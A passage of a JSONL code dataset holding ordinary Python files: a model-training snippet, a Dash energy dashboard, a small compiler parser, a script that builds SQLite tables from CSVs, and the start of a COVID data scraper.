100 == 0 and np.average(errlis[-50:]) > np.average(errlis[:50]):\n learR /= 2\n optimizer = torch.optim.Adam(model.parameters(), lr=learR)\n print(\"update learning rate, now is: \"+str(learR))\n errlis[t % 100] = loss.item()\n if(t % 25 == 0):\n model.eval()\n tmpy = model.forward(x_val)\n losstmp = np.sqrt(lossFunc(tmpy, y_val).item())\n if losstmp < lossReg:\n modelReg = copy.deepcopy(model)\n lossReg = losstmp\n torch.save(modelReg, \"./model.pt\")\n print(\"the \"+str(t)+\"-th training result is: \"+str(losstmp))\n model.train()\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \ntorch.save(modelReg, \"./model_mat.pt\")\n\nmodelReg.eval()\n\ntest = np.loadtxt(\"../data_mat/dataTest.dat\")\ntest = torch.as_tensor(test, dtype = torch.float32).to(device)\n\ntestval = modelReg(test)\n\nwith open(\"./resTest.dat\", \"w\") as f:\n f.write(\"Id,Predicted\\n\")\n ind = 1\n for tv in testval:\n f.write(str(ind) + \",\\t\" + str(tv.item())+\"\\n\")\n ind += 1","repo_name":"wzdlc1996/EnergyPred","sub_path":"hist/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9855679812","text":"import dash\nfrom dash import dcc\nfrom dash import html\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input,Output,State,MATCH,ALL\nimport pandas as pd\nimport pickle as pkl\nimport os\nimport base64\nimport plotly.express as px\nimport plotly.graph_objects as go\nfrom string import digits\nimport json\nfrom flask import Flask\nimport math\nfrom dash_extensions.snippets import send_data_frame\nfrom dash_extensions import Download\nimport flow_page\nimport price_page\nimport capacity_page\nimport net_import\nimport country_converter as coco\n\n#standard_names = coco.convert(names=['NO-02'], to='name_short')\n#print(standard_names)\n\n\nserver = Flask(__name__)\napp = dash.Dash(\n __name__,server=server,\n meta_tags=[\n {\n 'charset': 'utf-8',\n },\n {\n 'name': 'viewport',\n 'content': 'width=device-width, initial-scale=1.0' #, shrink-to-fit=no\n }\n ] ,\n)\n\nwith open(\"NetImport_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n\ncountries = list(object.keys())\nprint(countries)\n#df = object['FRA']\n#df.to_csv('FRA.csv')\n#print(df)\n#print(df.columns)\nprint('2022.5'.split('.'))\n\n#df=object['DEU']\n#print(df.head())\n#print(df.columns)\n#df.to_csv('DEU.csv')\n\n#dic=capacity_page.get_lon_lat(origins)\n#print(dic)\n\n#map_df=capacity_page.add_lon_lat(map_df)\n\n\n\n#map_df=pd.read_csv('map_data.csv')\n#print(map_df['origin'].unique())\n\n\n\n\n#external_stylesheets=[dbc.themes.BOOTSTRAP]\napp.config.suppress_callback_exceptions = True\n\ntext_font_size='1.7vh'\nnavbar_font_size='2vh'\nheader_font_size='2vh'\n\nencoded = base64.b64encode(open('plotly.png', 'rb').read())\n\nlogo_img=html.Img(src='data:image/jpg;base64,{}'.format(encoded.decode()), id='logo_img', height='70vh',\n style=dict(marginLeft='1vh'))\n\ndb_logo_img=dbc.Col([ logo_img] ,\n xs=dict(size=2,offset=0), sm=dict(size=2,offset=0),\n md=dict(size=1,offset=0), lg=dict(size=1,offset=0), xl=dict(size=1,offset=0))\n\nheader_text=html.Div('Data Visualization Dashboard',style=dict(color='white',\n fontWeight='bold',fontSize='2.8vh',marginTop='1vh',marginLeft='1.5vh'))\n\ndb_header_text= dbc.Col([ header_text] ,\n xs=dict(size=10,offset=0), sm=dict(size=10,offset=0),\n md=dict(size=10,offset=0), lg=dict(size=10,offset=0), xl=dict(size=10,offset=0))\n\n\n\n\nnavigation_header=dbc.Nav(\n [\n dbc.NavItem(dbc.NavLink(\"Flow\", active='exact', href=\"/Flow\",id='Flow',className=\"page-link\",\n style=dict(fontSize=navbar_font_size,color='primary'))),\n\n dbc.NavItem(dbc.NavLink(\"Power Planets\", href=\"/Planets\",active='exact',id='Planets',className=\"page-link\",\n style=dict(fontSize=navbar_font_size,color='primary'))),\n\n dbc.NavItem(dbc.NavLink(\"Power price\", href=\"/price\", active='exact', id='price',className=\"page-link\",\n style=dict(fontSize=navbar_font_size,color='primary'))),\n\n dbc.NavItem(dbc.NavLink(\"NetImport\", href=\"/NetImport\", active='exact', id='NetImport',className=\"page-link\",\n style=dict(fontSize=navbar_font_size,color='primary'))),\n\n dbc.NavItem(dbc.NavLink(\"TransmisionCap\", href=\"/TransmisionCap\", active='exact', id='TransmisionCap',className=\"page-link\",\n style=dict(fontSize=navbar_font_size,color='primary')))\n\n ],\n pills=True,\n)\ndb_navigation_header=dbc.Col([navigation_header],\n xs=dict(size=12, offset=0), sm=dict(size=12, offset=0),\n md=dict(size=12, offset=0), lg=dict(size=5, offset=1), xl=dict(size=5, offset=1)\n )\n\n\n\n#print( list( object.keys() ) )\n\n#print('DEU_AUT' , object['DEU_AUT'].head() )\n\n#filtered_by_hours = int((df.index.max() - df.index.min()) / pd.Timedelta('1 hour'))\n#dtick_hours=math.ceil( filtered_by_hours / (12) )\n\n\n\n\n\n\n\n\n\n\n\n\napp.layout=html.Div([ dbc.Row([db_logo_img,db_header_text],style=dict(backgroundColor='#20374c') )\n ,dbc.Row([db_navigation_header]) , html.Br() ,dbc.Row( id='layout')\n\n ,dcc.Location(id='url', refresh=True,pathname='/Flow')\n\n ])\n\n\n\n\n\n@app.callback(Output('layout','children'),\n Input('url','pathname'))\ndef change_page(url):\n if url == '/Flow':\n layout=flow_page.creat_flow_layout()\n return layout\n\n elif url == '/price':\n layout=price_page.creat_price_layout()\n return layout\n\n elif url == '/TransmisionCap':\n layout=capacity_page.create_capacity_layout()\n return layout\n\n elif url == '/NetImport':\n layout=net_import.create_net_import_layout()\n return layout\n\n else:\n return dash.no_update\n\n@app.callback([Output('flow_line_chart','figure'),Output('flow_data','data')],\n [Input('flow_country_menu','value'),Input('flow_resolution_menu','value'),Input('flow_scenarios_list','value')]\n )\ndef update_flow_line_chart(selected_countries,selected_resolution,selected_scenarios):\n with open(\"Flow_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n # countries = list(object.keys())\n df = object['{}'.format(selected_countries)]\n df.set_index('Date', inplace=True)\n df.columns=['1991', '1992', '1993', '1994', '1995', '1996', '1997',\n '1998', '1999', '2000', '2001', '2002', '2003', '2004',\n '2005', '2006', '2007', '2008', '2009', '2010', '2011',\n '2012', '2013', '2014', '2015', 'Normal']\n\n df['Exp']=df.iloc[: , :-1].mean(axis=1)\n graph_data =df.resample('3M').mean()\n if selected_resolution == 'Mean Agg. Quarterly':\n graph_data=df.resample('3M').mean()\n\n elif selected_resolution == 'Sum Agg. Quarterly':\n graph_data=df.resample('3M').sum()\n\n elif selected_resolution == 'Mean Agg. Monthly':\n graph_data=df.resample('1M').mean()\n\n elif selected_resolution == 'Sum Agg. Monthly':\n graph_data=df.resample('1M').sum()\n\n elif selected_resolution == 'Mean Agg. Daily':\n graph_data=df.resample('1D').mean()\n\n elif selected_resolution == 'Sum Agg. Daily':\n graph_data=df.resample('1D').sum()\n\n elif selected_resolution== 'Hourly':\n graph_data=df\n\n fig=go.Figure()\n colors = px.colors.qualitative.Light24\n colors[0]='lightsalmon'\n colors.extend(['#d5f4e6','#80ced6','#c83349'])\n scenarios_colors = {'1991': colors[0], '1992': colors[1], '1993': colors[2], '1994': colors[3],\n '1995': colors[4], '1996': colors[5], '1997': colors[6], '1998': colors[7],\n '1999': colors[8], '2000': colors[9],'2001': colors[10],'2002': colors[11],'2003': colors[12]\n ,'2004': colors[13],'2005': colors[14],'2006': colors[15],'2007': colors[16],'2008': colors[17],\n '2009': colors[18],'2010': colors[19],'2011': colors[20],'2012': colors[21],'2013': colors[22],\n '2014': colors[23],'2015': colors[24],'Normal': colors[25],'Exp':colors[26]}\n i=0\n for scenario in selected_scenarios:\n fig.add_trace(go.Scatter(x=graph_data.index, y=graph_data[scenario], mode='lines', name=scenario,\n marker_color=scenarios_colors[scenario]\n ))\n i+=1\n\n\n fig.update_layout(\n title='Power Flow', xaxis_title='Date', yaxis_title='MWh/h',\n font=dict(size=14, family='Arial', color='white'), hoverlabel=dict(\n font_size=16, font_family=\"Rockwell\", font_color='white', bgcolor='#20374c'), plot_bgcolor='#20374c',\n paper_bgcolor='#20374c',\n xaxis=dict(\n\n tickwidth=2, tickcolor='lightsalmon',\n ticks=\"outside\",\n tickson=\"labels\",\n rangeslider_visible=False\n )\n )\n#boundaries\n # 0f2537\n\n fig.update_xaxes(showgrid=False, showline=True, zeroline=False)\n fig.update_yaxes(showgrid=False, showline=True, zeroline=False)\n graph_data['Date']=graph_data.index\n selected_scenarios.append('Date')\n return (fig , graph_data[selected_scenarios].to_dict('records'))\n\n\n\n\n\n@app.callback([Output('price_line_chart','figure'),Output('price_data','data')],\n [Input('price_country_menu','value'),Input('price_resolution_menu','value'),Input('price_scenarios_list','value')]\n )\ndef update_price_line_chart(selected_countries,selected_resolution,selected_scenarios):\n with open(\"PowerPrice_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n # countries = list(object.keys())\n df = object['{}'.format(selected_countries)]\n df.set_index('Date', inplace=True)\n df.columns=['1991', '1992', '1993', '1994', '1995', '1996', '1997',\n '1998', '1999', '2000', '2001', '2002', '2003', '2004',\n '2005', '2006', '2007', '2008', '2009', '2010', '2011',\n '2012', '2013', '2014', '2015', 'Normal']\n\n df['Exp']=df.iloc[: , :-1].mean(axis=1)\n graph_data =df.resample('3M').mean()\n\n graph_data =df.resample('3M').mean()\n if selected_resolution == 'Mean Agg. Quarterly':\n graph_data=df.resample('3M').mean()\n\n elif selected_resolution == 'Sum Agg. Quarterly':\n graph_data=df.resample('3M').sum()\n\n elif selected_resolution == 'Mean Agg. Monthly':\n graph_data=df.resample('1M').mean()\n\n elif selected_resolution == 'Sum Agg. Monthly':\n graph_data=df.resample('1M').sum()\n\n elif selected_resolution == 'Mean Agg. Daily':\n graph_data=df.resample('1D').mean()\n\n elif selected_resolution == 'Sum Agg. Daily':\n graph_data=df.resample('1D').sum()\n\n elif selected_resolution== 'Hourly':\n graph_data=df\n\n fig=go.Figure()\n colors = px.colors.qualitative.Light24\n colors[0]='lightsalmon'\n colors.extend(['#d5f4e6','#80ced6','#c83349'])\n scenarios_colors = {'1991': colors[0], '1992': colors[1], '1993': colors[2], '1994': colors[3],\n '1995': colors[4], '1996': colors[5], '1997': colors[6], '1998': colors[7],\n '1999': colors[8], '2000': colors[9],'2001': colors[10],'2002': colors[11],'2003': colors[12]\n ,'2004': colors[13],'2005': colors[14],'2006': colors[15],'2007': colors[16],'2008': colors[17],\n '2009': colors[18],'2010': colors[19],'2011': colors[20],'2012': colors[21],'2013': colors[22],\n '2014': colors[23],'2015': colors[24],'Normal': colors[25],'Exp':colors[26]}\n i=0\n for scenario in selected_scenarios:\n fig.add_trace(go.Scatter(x=graph_data.index, y=graph_data[scenario], mode='lines', name=scenario,\n marker_color=scenarios_colors[scenario]\n ))\n i+=1\n\n\n fig.update_layout(\n title='Power Price', xaxis_title='Date', yaxis_title='€/MWh',\n font=dict(size=14, family='Arial', color='white'), hoverlabel=dict(\n font_size=16, font_family=\"Rockwell\", font_color='white', bgcolor='#20374c'), plot_bgcolor='#20374c',\n paper_bgcolor='#20374c',\n xaxis=dict(\n\n tickwidth=2, tickcolor='lightsalmon',\n ticks=\"outside\",\n tickson=\"labels\",\n rangeslider_visible=False\n )\n )\n#boundaries\n # 0f2537\n\n fig.update_xaxes(showgrid=False, showline=True, zeroline=False)\n fig.update_yaxes(showgrid=False, showline=True, zeroline=False)\n graph_data['Date']=graph_data.index\n selected_scenarios.append('Date')\n return (fig , graph_data[selected_scenarios].to_dict('records'))\n\n\n\n\n@app.callback([Output('cap_line_chart','figure'),Output('cap_data','data')],\n [Input('cap_country_menu','value'),Input('cap_resolution_menu','value')]\n )\ndef update_cap_line_chart(selected_countries,selected_resolution):\n with open(\"TransmissionCap_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n # countries = list(object.keys())\n df = object['{}'.format(selected_countries)]\n df.set_index('Date', inplace=True)\n df.columns=['1991', '1992', '1993', '1994', '1995', '1996', '1997',\n '1998', '1999', '2000', '2001', '2002', '2003', '2004',\n '2005', '2006', '2007', '2008', '2009', '2010', '2011',\n '2012', '2013', '2014', '2015', 'Normal']\n\n graph_data =df.resample('3M').mean()\n if selected_resolution == 'Mean Agg. Quarterly':\n graph_data=df.resample('3M').mean()\n\n elif selected_resolution == 'Sum Agg. Quarterly':\n graph_data=df.resample('3M').sum()\n\n elif selected_resolution == 'Mean Agg. Monthly':\n graph_data=df.resample('1M').mean()\n\n elif selected_resolution == 'Sum Agg. Monthly':\n graph_data=df.resample('1M').sum()\n\n elif selected_resolution == 'Mean Agg. Daily':\n graph_data=df.resample('1D').mean()\n\n elif selected_resolution == 'Sum Agg. Daily':\n graph_data=df.resample('1D').sum()\n\n elif selected_resolution== 'Hourly':\n graph_data=df\n\n fig=go.Figure()\n\n\n fig.add_trace(go.Scatter(x=graph_data.index, y=graph_data['Normal'], mode='lines', name='Normal',\n marker_color='#80ced6' , showlegend=True\n ))\n\n\n\n fig.update_layout(\n title='Power Capacity', xaxis_title='Date', yaxis_title='MW',\n font=dict(size=14, family='Arial', color='white'), hoverlabel=dict(\n font_size=16, font_family=\"Rockwell\", font_color='white', bgcolor='#20374c'), plot_bgcolor='#20374c',\n paper_bgcolor='#20374c',\n xaxis=dict(\n\n tickwidth=2, tickcolor='lightsalmon',\n ticks=\"outside\",\n tickson=\"labels\",\n rangeslider_visible=False\n )\n )\n#boundaries\n # 0f2537\n\n fig.update_xaxes(showgrid=False, showline=True, zeroline=False)\n fig.update_yaxes(showgrid=False, showline=True, zeroline=False)\n graph_data['Date']=graph_data.index\n\n return (fig , graph_data.to_dict('records'))\n\n\n\n\n\n@app.callback(Output('flow_csv_download_data', 'data'),\n Input('flow_download_csv', 'n_clicks'),State('flow_data','data')\n\n ,prevent_initial_call=True)\ndef download_flow_csv(clicks,flow_data):\n flow_df=pd.DataFrame(flow_data)\n return send_data_frame(flow_df.to_csv, \"flow_data.csv\")\n\n\n@app.callback(Output('price_csv_download_data', 'data'),\n Input('price_download_csv', 'n_clicks'),State('price_data','data')\n\n ,prevent_initial_call=True)\ndef download_flow_csv(clicks,price_data):\n price_df=pd.DataFrame(price_data)\n return send_data_frame(price_df.to_csv, \"price_data.csv\")\n\n@app.callback(Output('cap_csv_download_data', 'data'),\n Input('cap_download_csv', 'n_clicks'),State('cap_data','data')\n\n ,prevent_initial_call=True)\ndef download_cap_csv(clicks,cap_data):\n cap_df=pd.DataFrame(cap_data)\n return send_data_frame(cap_df.to_csv, \"cap_data.csv\")\n\n\n@app.callback(Output('capacity_map', 'figure'),\n Input('cap_map_slider', 'value'))\ndef update_cap_map(years_range):\n with open(\"TransmissionCap_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n map_fig=capacity_page.create_cap_map(object, years_range)\n return map_fig\n\n@app.callback(Output('flow_bar_chart', 'figure'),\n Input('flow_bar_slider', 'value'))\ndef update_flow_bar(years_range):\n with open(\"Flow_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n bar_fig=flow_page.create_flow_bar_fig(object,years_range)\n return bar_fig\n\n@app.callback(Output('price_bar_chart', 'figure'),\n Input('price_bar_slider', 'value'))\ndef update_price_bar(years_range):\n with open(\"PowerPrice_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n bar_fig=price_page.create_price_bar_fig(object,years_range)\n return bar_fig\n\n\n@app.callback(Output('net_import_map', 'figure'),\n Input('net_imp_map_slider', 'value'))\ndef update_net_map(years_range):\n with open(\"Flow_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n map_fig=net_import.create_net_import_map(object, years_range)\n return map_fig\n\nif __name__ == '__main__':\n app.run_server(host='localhost',port=8050,debug=True,dev_tools_silence_routes_logging=True)","repo_name":"rodiscience/ML-model-dashboard","sub_path":"assets/updates2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16274,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"39272675106","text":"from src.Scanner import Scanner\nfrom src.utils import token_table\n\n\nclass Parser:\n\n def __init__(self, file):\n self.sintax_is_right = True\n self.file = file\n self.token = None\n self.context = {}\n self.aux = 0\n\n self.code = open(\"codigo_intermediario.txt\", \"w\")\n\n def run(self):\n with open(self.file) as code:\n self.scanner = Scanner(code)\n self.scanner.lookahead = self.scanner.read()\n\n while self.scanner.lookahead:\n self.program()\n \n def program (self):\n \"\"\"\n ::= int main ( ) \n \"\"\"\n self.token = self.scanner.get_token()\n if self.token[0] != token_table['int']:\n self.scanner.error('Programa não iniciado por declaração de int.')\n\n self.token = self.scanner.get_token()\n if self.token[0] != token_table['main']:\n self.scanner.error('Função main não declarada.')\n\n self.token = self.scanner.get_token()\n if self.token[0] != token_table['(']:\n self.scanner.error('Parênteses não abertos.')\n\n self.token = self.scanner.get_token()\n if self.token[0] != token_table[')']:\n self.scanner.error('Parênteses não fechados.')\n\n self.token = self.scanner.get_token()\n self.code_block()\n \n self.token = self.scanner.get_token()\n if self.token:\n self.scanner.error('Programa não finalizado com fechamento de bloco de código.')\n\n def code_block(self):\n \"\"\"\n ::= { * * }\n \"\"\"\n previous_context = self.context.copy()\n\n if self.token[0] != token_table['{']:\n self.scanner.error(\"Bloco de código não iniciado por '{'\")\n \n self.token = self.scanner.get_token()\n while (self.token != None and self.token[0] != token_table['}']):\n \n if self.type():\n self.declaration_of_variable(self.token[1], previous_context)\n\n else:\n self.command()\n \n self.token = self.scanner.get_token()\n\n if self.token[0] != token_table['}']:\n self.scanner.error(\"Bloco de código não finalizado por '}'\")\n\n self.context = previous_context\n\n def declaration_of_variable(self, var_type, previous_context):\n \"\"\"\n ::= ;\n \"\"\"\n\n # id\n self.token = self.scanner.get_token()\n if (self.token[0] != token_table['id']):\n self.scanner.error(\"Token esperado: identificador\")\n self.write_code(var_type)\n self.write_code(self.token[1], ';\\n')\n \n if self.token[1] in self.context.keys() and self.token[1] not in previous_context.keys():\n self.scanner.error(\"Variável já declarada no mesmo escopo\")\n self.context[self.token[1]] = var_type\n\n self.token = self.scanner.get_token()\n while (self.token[0] == token_table[',']):\n self.token = self.scanner.get_token()\n if (self.token[0] != token_table['id']):\n self.scanner.error(\"Token esperado: identificador\")\n self.write_code(var_type)\n self.write_code(self.token[1], ';\\n')\n\n if self.token[1] in self.context.keys() and self.token[1] not in previous_context.keys():\n self.scanner.error(\"Variável já declarada no mesmo escopo\")\n self.context[self.token[1]] = var_type\n self.token = self.scanner.get_token()\n\n if (self.token[0] != token_table[';']):\n self.scanner.error(\"; esperado ao final de declaração de variável\")\n\n def command(self):\n \"\"\"\n ::= | | if ( ) else +\n \"\"\"\n if (self.token[0] == token_table['id'] or self.token[0] == token_table['{']):\n self.basic_command()\n elif(self.token[0] == token_table['while']):\n self.iteration()\n elif(self.token[0] == token_table['if']):\n self.if_command()\n else:\n self.scanner.error('Bloco de comando mal formado.')\n\n\n def basic_command(self):\n \"\"\"\n ::= | \n \"\"\"\n if (self.token[0] == token_table['id']):\n if self.token[1] not in self.context:\n self.scanner.error('Uso de variável não declarada')\n self.attr(self.context[self.token[1]])\n elif(self.token[0] == token_table['{']):\n self.code_block()\n\n def if_command(self):\n \"\"\"\n if ( ) else +\n \"\"\"\n self.token = self.scanner.get_token()\n if (self.token[0] == token_table['(']):\n self.relational_expression()\n \n if self.token[0] != token_table[')']:\n self.scanner.error('Parênteses desbalanceados no if.')\n \n self.token = self.scanner.get_token()\n self.command()\n\n self.token = self.scanner.get_token()\n if self.token[0] == token_table['else']:\n self.token = self.scanner.get_token()\n self.command()\n\n else:\n self.scanner.error('Comando if não seguido por abertura de parênteses.')\n\n def iteration(self):\n \"\"\"\n ::= while ( ) \n \"\"\"\n self.token = self.scanner.get_token()\n if self.token[0] != token_table['(']:\n self.scanner.error('Comando while não seguido por abertura de parênteses.')\n \n self.relational_expression()\n\n if self.token[0] != token_table[')']:\n self.scanner.error('Parênteses desbalanceados no while.')\n\n self.token = self.scanner.get_token()\n self.command()\n\n def attr(self, var_type_a):\n \"\"\"\n ::= = ;\n \"\"\"\n self.aux = 0\n var = self.token[1]\n\n self.token = self.scanner.get_token()\n if (self.token[0] == token_table['=']):\n \n var_type_b, expr = self.arithmetic_expression()\n\n if var_type_a != var_type_b:\n self.scanner.error('Atribuição de variável de tipos diferentes')\n\n #self.token = self.scanner.get_token()\n if self.token[0] != token_table[';']:\n self.scanner.error('Esperado ; ao final de atribuição.')\n\n self.write_code(var + ' = ' + expr, ';\\n')\n\n else:\n self.scanner.error('Operador de atribuição esperado.')\n\n def relational_expression(self):\n \"\"\"\n ::= \n \"\"\"\n var_type_a, expr = self.arithmetic_expression()\n\n self.relational_operator()\n\n var_type_b, expr2 = self.arithmetic_expression()\n\n if var_type_a != var_type_b:\n self.scanner.error('Operação relacional com tipos diferentes')\n\n def relational_operator(self):\n \"\"\"\n ::= == | != | < | > | <= | >=\n \"\"\"\n if (self.token[0] == token_table['=='] \n or self.token[0] == token_table['!='] \n or self.token[0] == token_table['<'] \n or self.token[0] == token_table['>'] \n or self.token[0] == token_table['<='] \n or self.token[0] == token_table['>=']):\n return True\n else:\n self.scanner.error('Operador relacional esperado.')\n\n def arithmetic_expression(self):\n \"\"\"\n ::= \n \"\"\"\n var_type_a, expr = self.term()\n var_type_b, expr2 = self.derived_arithmetic_expression(var_type_a, expr)\n\n if expr2 is not None:\n var_type_a = var_type_b\n expr = expr2\n return var_type_a, expr\n\n def derived_arithmetic_expression(self, var_type_a, expr, flag=False):\n \"\"\"\n ::= + | - | null\n \"\"\"\n if (self.token[0] == token_table['+'] or self.token[0] == token_table['-']):\n if any([op in expr for op in ['*', '/', '+', '-']]):\n self.write_code('t'+str(self.aux) + ' = ' + expr, ';\\n')\n expr = 't'+str(self.aux)\n self.aux = self.aux + 1\n\n expr = expr + ' ' + self.token[1]\n var_type_b, expr2 = self.term()\n \n if expr2 is not None and flag is False:\n expr = expr + ' ' + expr2\n\n if any([op in expr for op in ['*', '/', '+', '-']]):\n self.write_code('t'+str(self.aux) + ' = ' + expr, ';\\n')\n expr = 't'+str(self.aux)\n self.aux = self.aux + 1\n else:\n expr = expr + ' ' + expr2\n\n if var_type_a != var_type_b and var_type_a is not None and var_type_b is not None:\n self.scanner.error('Operação aritmética com tipos diferentes')\n \n _, expr3 = self.derived_arithmetic_expression(var_type_a, expr, flag=True)\n\n if expr3 is not None:\n expr = expr3\n\n return var_type_a, expr\n else:\n return None, None\n\n def term(self):\n \"\"\"\n ::= \n \"\"\"\n var_type_a, expr = self.factor()\n var_type_b, expr2 = self.derived_term(var_type_a, expr)\n\n \n if expr2 is not None:\n expr = expr2\n \n return var_type_a, expr\n\n def derived_term(self, var_type_a, expr, flag=False):\n \"\"\"\n ::= * | / | null\n \"\"\"\n self.token = self.scanner.get_token()\n if (self.token[0] == token_table['*'] or self.token[0] == token_table['/']):\n if any([op in expr for op in ['*', '/', '+', '-']]):\n self.write_code('t'+str(self.aux) + ' = ' + expr, ';\\n')\n expr = 't'+str(self.aux)\n self.aux = self.aux + 1\n\n expr = expr + ' ' + self.token[1]\n var_type_b, expr2 = self.factor()\n\n if expr2 is not None and flag is False:\n expr = expr + ' ' + expr2\n\n if any([op in expr for op in ['*', '/', '+', '-']]):\n self.write_code('t'+str(self.aux) + ' = ' + expr, ';\\n')\n expr = 't'+str(self.aux)\n self.aux = self.aux + 1\n\n else:\n expr = expr + ' ' + expr2\n\n if var_type_a != var_type_b and var_type_a is not None and var_type_b is not None:\n self.scanner.error('Operação aritmética com tipos diferentes')\n\n _, expr3 = self.derived_term(var_type_a, expr, flag=True)\n\n if expr3 is not None:\n expr = expr3\n return var_type_a, expr\n else:\n return None, None\n\n def factor(self):\n \"\"\"\n ::= ( ) | | | \n \"\"\"\n self.token = self.scanner.get_token()\n if (self.token[0] == token_table['id']):\n return self.context[self.token[1]], self.token[1]\n elif self.token[0] == token_table['int_value']:\n return 'int', self.token[1]\n elif self.token[0] == token_table['float_value']:\n return 'float', self.token[1]\n elif self.token[0] == token_table['char_value']:\n return 'char', self.token[1]\n elif(self.token[0] == token_table['(']):\n \n var_type_a, expr = self.arithmetic_expression()\n\n if (self.token[0] != token_table[')']):\n self.scanner.error('Parênteses desbalanceados.')\n \n return var_type_a, expr\n else:\n self.scanner.error('Esperado uma expressão aritmética, variável, valor inteiro, float ou char')\n\n def type(self):\n \"\"\"\n ::= int | float | char\n \"\"\"\n return self.token[0] == token_table['int'] or self.token[0] == token_table['float'] or self.token[0] == token_table['char']\n\n def write_code(self, token, space=' '):\n self.code.write(token + space)\n\n def close_code(self):\n self.code.close()","repo_name":"filipecmedeiros/compiler","sub_path":"src/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":12411,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32823989221","text":"#!/usr/bin/env python\n\n# Create the simple tables requested and run the necessary queries.\n#\n# I will actually create the tables in two different ways - one using\n# the standard python approach we have seen before, and one using Pandas.\n#\n\n# I import the print function here so that the code works\n# with both python2 and python3\nfrom __future__ import print_function\nimport sqlite3 as lite\nfrom astropy.table import Table\nimport pandas as pd\n\ndef is_number(s):\n # I need a function like this below to decide whether\n # to insert apostrophes around the arguments in SQL.\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n#\n# Standard Python creation\n#\n\n# I will simplify the creation a bit - for readability I define the schemas here\nMagSchema = \"\"\"CREATE TABLE IF NOT EXISTS MagTable (Name varchar(6),\n Ra varchar(12),\n Decl varchar(12),\n B Float,\n R Float,\n UNIQUE(Name));\n\"\"\"\n# Note that I decided to modify the table somewhat - that is ok, and\n# split off the unit as a separate quantity.\nPhysSchema = \"\"\"\nCREATE TABLE IF NOT EXISTS PhysTable (Name varchar(6),\n Teff Float,\n Unit varchar(1),\n FeH Float,\n UNIQUE(Name));\n\"\"\"\n\n\n# I now define my tables through a dict. Each element in the dict\n# contains the name of the file to read the data from and the\n# schema that we want to use.\ntables = {'MagTable': ['MagTable.csv', MagSchema],\n 'PhysTable': ['PhysTable.csv', PhysSchema]}\n\ncon = lite.connect('SimpleTables-default.db')\nwith con:\n for name in tables.keys():\n file_name, schema = tables[name]\n print(\"I will read from {0}\".format(file_name))\n t = Table().read(file_name, format='csv')\n\n con.execute(schema)\n for row in t:\n command = \"INSERT INTO {0} VALUES(\".format(name)\n n_columns = len(row)\n for i, col in enumerate(row):\n # Now the trick here is how to handle strings. Numbers do\n # not need to be enclosed in apostrophes so I'll just do\n # the simple check\n if is_number(col):\n arg = str(col)\n else:\n arg = \"'\"+str(col)+\"'\"\n \n command = command+arg\n if i < n_columns-1:\n command = command+','\n\n command = command+')'\n \n try:\n print(\"Command = {0}\".format(command))\n con.execute(command)\n except:\n pass\n \n\n\n#\n# Create the tables using Pandas.\n#\n# To do this, we first need to create Pandas data frame. Luckily this is\n# very easy from astropy tables\n#\nMagTable = Table().read('MagTable.csv', format='csv')\nPhysTable = Table().read('PhysTable.csv', format='csv')\n\n# Conversion to Pandas data frames.\ndf_MagTable = MagTable.to_pandas()\ndf_PhysTable = PhysTable.to_pandas()\n\n# Finally, create the connection\ncon = lite.connect('SimpleTables-pandas.db')\n\n# And create the tables.\ndf_MagTable.to_sql(\"MagTable\", con, if_exists='replace')\ndf_PhysTable.to_sql(\"PhysTable\", con, if_exists='replace')\n","repo_name":"jbrinchmann/MLD2019","sub_path":"ProblemSets/1 - SQL and Databases/Solution/make_simple_tables.py","file_name":"make_simple_tables.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"16469695852","text":"import numpy as np\r\nimport pandas as pd\r\nimport plotly.graph_objects as go\r\nimport dash\r\nimport dash_html_components as html\r\nimport dash_core_components as dcc\r\nfrom dash import Dash\r\nfrom dash.dependencies import Input, Output\r\nfrom io import StringIO\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport plotly.offline as pyo\r\nimport os\r\nfrom requests import request\r\nimport urllib.request\r\nimport json\r\nfrom pandas.io.json import json_normalize\r\n\r\n\r\n\r\n\r\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36'}\r\n\r\nurl = 'https://www.mohfw.gov.in/'\r\n# make a GET request to fetch the raw HTML content\r\nweb_content = requests.get(url).content\r\n# parse the html content\r\nsoup = BeautifulSoup(web_content, \"html.parser\")\r\n# remove any newlines and extra spaces from left and right\r\nextract_contents = lambda row: [x.text.replace('\\n', '') for x in row]\r\n# find all table rows and data cells within\r\nstats = []\r\nall_rows = soup.find_all('tr')\r\nfor row in all_rows:\r\n stat = extract_contents(row.find_all('td'))\r\n# notice that the data that we require is now a list of length 5\r\n if len(stat) == 5:\r\n stats.append(stat)\r\n#now convert the data into a pandas dataframe for further processing\r\nnew_cols = [\"Sr.No\", \"States/UT\",\"Confirmed\",\"Recovered\",\"Deceased\"]\r\nstate_data = pd.DataFrame(data = stats, columns = new_cols)\r\n\r\npop = pd.read_csv('population_india_census2011.csv')\r\npop.rename(columns={'State / Union Territory': 'States/UT'}, inplace = True)\r\n\r\np = pd.read_csv('population_india_census2011.csv')\r\np.rename(columns={'State / Union Territory': 'States/UT'}, inplace = True)\r\n\r\nlist_ = state_data['States/UT'].unique()\r\ndf = p[p['States/UT'].isin(['list_']) == False]\r\nstate_data = pd.merge(state_data,df,on = 